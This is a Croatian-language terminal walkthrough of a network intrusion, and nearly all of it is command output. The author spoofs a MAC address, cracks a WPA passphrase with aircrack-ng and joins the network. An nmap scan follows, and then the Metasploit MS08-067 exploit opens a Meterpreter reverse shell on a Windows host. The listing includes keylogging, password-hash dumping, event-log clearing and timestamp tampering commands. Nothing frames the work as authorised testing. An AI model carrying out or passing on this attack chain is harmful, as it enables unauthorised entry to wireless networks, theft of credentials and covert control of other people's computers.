IEEE 802.11bg Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dbm

root@bt:~# airmon-ng Interface Chipset Driver wlan0 wlan1 Ralink 2570 USB rt2500usb - [phy1] Intel 3945ABG iwl3945 - [phy0] root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wlan0 Ralink 2570 USB rt2500usb - [phy1] (monitor mode enabled on mon0) wlan1 Intel 3945ABG iwl3945 - [phy0] root@bt:~# ifconfig mon0 down root@bt:~# macchanger -r mon0 Current MAC: 4b:6d:a2:bb:3d:42 (Original) Faked MAC: 1a:1c:ea:c1:a5:41 (unknown) root@bt:~# ifconfig mon0 up root@bt:~# iwconfig mon0 mon0 IEEE 802.11bg Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dbm Retry min limit:7 RTS thr:off Fragment thr:off Encryption key:off

Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 root@bt:~# airodump-ng mon0 root@bt:~# airodump-ng -c 6 --bssid 31:08:34:1b:5a:21 -w wpapsk mon0 CH 6 ][ Elapsed: 8 s ][ 2010-10-27 17:50 ][ WPA handshake: 03:CD:B5:34:3D:12 Aircrack-ng 1.0 r1645 [00:00:10] 10316 keys tested (978.63 k/s) KEY FOUND! [ proracunska ] Master Key : 72 50 BE B9 53 D8 75 38 F7 55 84 DA 1E BC F3 2A 33 2D B0 9B BA D6 F8 8E D6 4F 15 62 61 84 C4 68 Transient Key : 59 19 7A 79 A8 AE E3 11 E2 DA 65 E1 63 7A 0C 14 BC D3 51 95 45 2D 3B BE 1B 2C 9F AA 6B 3E 3A 73 7F E6 3C B0 E6 6F C4 52 00 CF A9 E0 B5 35 0A FB 5D 0C D8 57 47 15 3D DF 25 E9 E0 8D 09 CD 0A ED EAPOL HMAC : 29 56 70 5D 1C 12 C3 01 42 0B 71 CE 2B 13 C9 F9

Sada ću se spojiti na mrežu tako sto ću koristiti istu mac adresu koju sam bio promijenio. root@bt:~# airmon-ng stop mon0 root@bt:~# macchanger wlan0 -m : 1a:1c:ea:c1:a5:41 Pokrenuti ću wicd network manager i spojiti se. Pokrenuti ću nmap da vidim koji su sve sistemi na mojoj mreži. root@bt:~# nmap -O 192.168.1.1/24 -O: detekcija operativnog sitema Nmap scan report for server.dummy.porta.siemens.net (192.168.1.232) Host is up (0.0018s latency). Not shown: 988 closed ports PORT STATE SERVICE 23/tcp open telnet 53/tcp open domain 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1029/tcp open ms-lsa 1031/tcp open iad2 1032/tcp open iad3

3389/tcp open ms-term-serv MAC Address: A6:DB:CB:21:85:C3 (Microsoft) Device type: general purpose Running: Microsoft Windows 2000 XP 2003 OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2 Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/. Nmap done: 256 IP addresses (9 hosts up) scanned in 11.46 seconds Zbog toga što sada znamo koju verziju imamo u mreži te je izašao kod koji napada TCP port 139 i 445 te su windows xp SP3 i windows server 2003 ranjivi za daljinski napad. Zakrpa je izašla 23.10.2008 Pokrenuti ću metasploit root@bt:~# msfconsole =[ metasploit v3.5.1-dev [core:3.5 api:1.0] + -- --=[ 628 exploits - 309 auxiliary + -- --=[ 215 payloads - 27 encoders - 8 nops =[ svn r10964 updated 7 days ago (2010.11.09) msf > show exploits msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.232 RHOST => 192.168.1.232 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.223:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 No Service Pack - lang:unknown [*] Selected Target: Windows 2003 SP0 Universal [*] Attempting to trigger the vulnerability... [*] Sending stage (749056 bytes) to 192.168.1.232 [*] Meterpreter session 1 opened (192.168.1.223:4444 -> 192.168.1.232:445) at 2010-11-16 21:59:39 +0100 meterpreter > help Core s =============? Help menu background Backgrounds the current session bgkill bglist Kills a background meterpreter script Lists running background scripts

bgrun channel close exit help interact irb migrate quit read run use write Executes a meterpreter script as a background thread Displays information about active channels Closes a channel Terminate the meterpreter session Help menu Interacts with a channel Drop into irb scripting mode Migrate the server to another process Terminate the meterpreter session Reads data from a channel Executes a meterpreter script Load a one or more meterpreter extensions Writes data to a channel Stdapi: File system s ============================ cat cd del Read the contents of a file to the screen Change directory Delete the specified file download Download a file or directory edit getlwd getwd Edit a file Print local working directory Print working directory

lcd lpwd ls mkdir pwd rm rmdir search upload Change local working directory Print local working directory List files Make directory Print working directory Delete the specified file Remove directory Search for files Upload a file or directory Stdapi: Networking s =========================== ipconfig portfwd route Display interfaces Forward a local port to a remote service View and modify the routing table Stdapi: System s ======================= clearev Clear the event log

drop_token Relinquishes any active impersonation token. execute getpid getprivs getuid kill ps reboot reg rev2self shell Execute a command Get the current process identifier Get as many privileges as possible Get the user that the server is running as Terminate a process List running processes Reboots the remote computer Modify and interact with the remote registry Calls RevertToSelf() on the remote machine Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OS Stdapi: User interface s =============================== enumdesktops List all accessible desktops and window stations getdesktop idletime Get the current meterpreter desktop Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes

screenshot setdesktop Grab a screenshot of the interactive desktop Change the meterpreters current desktop uictl Control some of the user interface components Priv: Elevate s ====================== getsystem Attempt to elevate your privilege to that of local system. Priv: Password database s ================================ hashdump Dumps the contents of the SAM database Priv: Timestomp s ======================== timestomp Manipulate file MACE attributes

meterpreter > idletime User has been idle for: 6 mins 10 secs Kao što vidimo možemo dalje manipulirati sistemom.